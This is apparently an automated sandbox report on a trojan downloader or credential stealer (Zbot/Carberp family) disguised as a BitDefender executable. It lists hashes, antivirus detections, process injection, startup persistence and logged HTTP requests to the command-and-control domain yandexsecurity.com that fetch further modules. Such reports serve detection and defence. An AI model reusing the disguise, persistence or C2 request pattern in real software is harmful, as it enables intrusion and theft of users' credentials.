Analysis Date2015-06-13 08:05:21
MD513b47cad6d1920bb4902017e848e2f27
SHA1fd31547cc9dd4d239ca1073211dffeb170a4ee82

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: a6696dd8556d3262794f97a60a002021 sha1: 24d0cb292c2cd82f935c828f724d26a56ceeeea9 size: 79872
Section.rsrc md5: 9598e614f1deca8254f5861db69369fa sha1: a03eab35b603d47d85f3eb86208c4d6b78a3a4e4 size: 1536
Timestamp2006-09-24 06:40:04
VersionLegalCopyright: © 2006 SOFTWIN S.R.L.
InternalName: Management Console
FileVersion: 10, 2, 0, 15
CompanyName: SOFTWIN S.R.L.
ProductName: BitDefender 10
ProductVersion: 10, 2, 0, 15
FileDescription: BitDefender Management Console
OriginalFilename: bdmcon.exe
PackerUPX -> www.upx.sourceforge.net
PEhashcedda77b2ceb3157ae2796aae6a45c0ec3a1be33
IMPhashd8ffd01375769ab5ef057d6a238f55de
AVAvira (antivir)TR/Dldr.Small.auep
AVIkarusTrojan-Downloader.Win32.Small
AVF-SecureGen:Variant.Zbot.19
AVCA (E-Trust Ino)Win32/PornoAsset.A!generic
AVMcafeeno_virus
AVArcabit (arcavir)Gen:Variant.Zbot.19
AVFrisk (f-prot)W32/Zbot.AM.gen!Eldorado
AVPadvishno_virus
AVBitDefenderGen:Variant.Zbot.19
AVTrend MicroTROJ_DLOAD.KLL
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Carberp.A
AVGrisoft (avg)Downloader.Generic10.RCB
AVAd-AwareGen:Variant.Zbot.19
AVTwisterTrojan.210D090208@1F0000.mg
AVMalwareBytesSpyware.Passwords.XGen
AVAlwil (avast)Evo-gen [Susp]
AVBullGuardGen:Variant.Zbot.19
AVEmsisoftGen:Variant.Zbot.19
AVEset (nod32)Win32/Kryptik.GQM
AVSymantecDownloader
AVClamAVTrojan.Generic.FakeAV.WKA-1
AVK7Backdoor ( 04c4d5271 )
AVMicroWorld (escan)Gen:Variant.Zbot.19
AVFortinetW32/Krypt.A!tr.dldr
AVVirusBlokAda (vba32)Malware-Cryptor.Win32.General.4.1
AVAuthentiumW32/Zbot.AM.gen!Eldorado
AVZillya!no_virus
AVCAT (quickheal)no_virus
AVDr. WebTrojan.PWS.Stealer.258
AVKasperskyTrojan.Win32.Generic
AVRisingno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~TM5.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\3.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\~TM4.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\2.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\~TM5.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\3.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\~TM4.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\2.tmp
Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\8.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\syscron.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\B.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\12.tmp
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\C.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\7.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\9.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\A.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\8.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\6.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\B.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\12.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\C.tmp
Deletes FileC:\malware.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\7.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\9.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\A.tmp
Creates ProcessC:\WINDOWS\system32\svchost.exe -k netsvcs
Creates ProcessC:\WINDOWS\system32\svchost.exe -k netsvcs

Process
↳ C:\WINDOWS\system32\svchost.exe -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\10.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\F.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\E.tmp
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\usernt.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\D.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\F.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\E.tmp
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSyandexsecurity.com

Process
↳ C:\WINDOWS\system32\svchost.exe -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\14.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\11.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\13.tmp
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\14.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\11.tmp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\13.tmp
Winsock DNSyandexsecurity.com

Network Details:

DNSyandexsecurity.com
Type: A
141.8.225.80
DNSyandexsecurity.com
Type: A
141.8.225.80
HTTP GEThttp://yandexsecurity.com/task.php?id=HEXOR09F2F48419E66A986C91571E13C2E0452&task=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4
HTTP GEThttp://yandexsecurity.com/micfile.pcp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://yandexsecurity.com/grabber.pcp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f746173 6b2e7068 703f6964   GET /task.php?id
0x00000010 (00016)   3d484558 4f523039 46324634 38343139   =HEXOR09F2F48419
0x00000020 (00032)   45363641 39383643 39313537 31453133   E66A986C91571E13
0x00000030 (00048)   43324530 34353226 7461736b 3d302048   C2E0452&task=0 H
0x00000040 (00064)   5454502f 312e300d 0a486f73 743a2079   TTP/1.0..Host: y
0x00000050 (00080)   616e6465 78736563 75726974 792e636f   andexsecurity.co
0x00000060 (00096)   6d0d0a55 7365722d 4167656e 743a204d   m..User-Agent: M
0x00000070 (00112)   6f7a696c 6c612f35 2e302028 57696e64   ozilla/5.0 (Wind
0x00000080 (00128)   6f77733b 20553b20 57696e64 6f777320   ows; U; Windows 
0x00000090 (00144)   4e542035 2e313b20 72753b20 72763a31   NT 5.1; ru; rv:1
0x000000a0 (00160)   2e392e31 2e342920 4765636b 6f2f3230   .9.1.4) Gecko/20
0x000000b0 (00176)   30393130 31362046 69726566 6f782f33   091016 Firefox/3
0x000000c0 (00192)   2e352e34 0d0a436f 6e6e6563 74696f6e   .5.4..Connection
0x000000d0 (00208)   3a20636c 6f73650d 0a0d0a              : close....

0x00000000 (00000)   47455420 2f6d6963 66696c65 2e706370   GET /micfile.pcp
0x00000010 (00016)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000020 (00032)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000030 (00048)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000040 (00064)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000050 (00080)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000060 (00096)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000070 (00112)   37290d0a 486f7374 3a207961 6e646578   7)..Host: yandex
0x00000080 (00128)   73656375 72697479 2e636f6d 0d0a4361   security.com..Ca
0x00000090 (00144)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000a0 (00160)   63616368 650d0a0d 0a65636b 6f2f3230   cache....ecko/20
0x000000b0 (00176)   30393130 31362046 69726566 6f782f33   091016 Firefox/3
0x000000c0 (00192)   2e352e34 0d0a436f 6e6e6563 74696f6e   .5.4..Connection
0x000000d0 (00208)   3a20636c 6f73650d 0a0d0a              : close....

0x00000000 (00000)   47455420 2f677261 62626572 2e706370   GET /grabber.pcp
0x00000010 (00016)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000020 (00032)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000030 (00048)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000040 (00064)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000050 (00080)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000060 (00096)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x00000070 (00112)   37290d0a 486f7374 3a207961 6e646578   7)..Host: yandex
0x00000080 (00128)   73656375 72697479 2e636f6d 0d0a4361   security.com..Ca
0x00000090 (00144)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x000000a0 (00160)   63616368 650d0a0d 0a65636b 6f2f3230   cache....ecko/20
0x000000b0 (00176)   30393130 31362046 69726566 6f782f33   091016 Firefox/3
0x000000c0 (00192)   2e352e34 0d0a436f 6e6e6563 74696f6e   .5.4..Connection
0x000000d0 (00208)   3a20636c 6f73650d 0a0d0a              : close....


Strings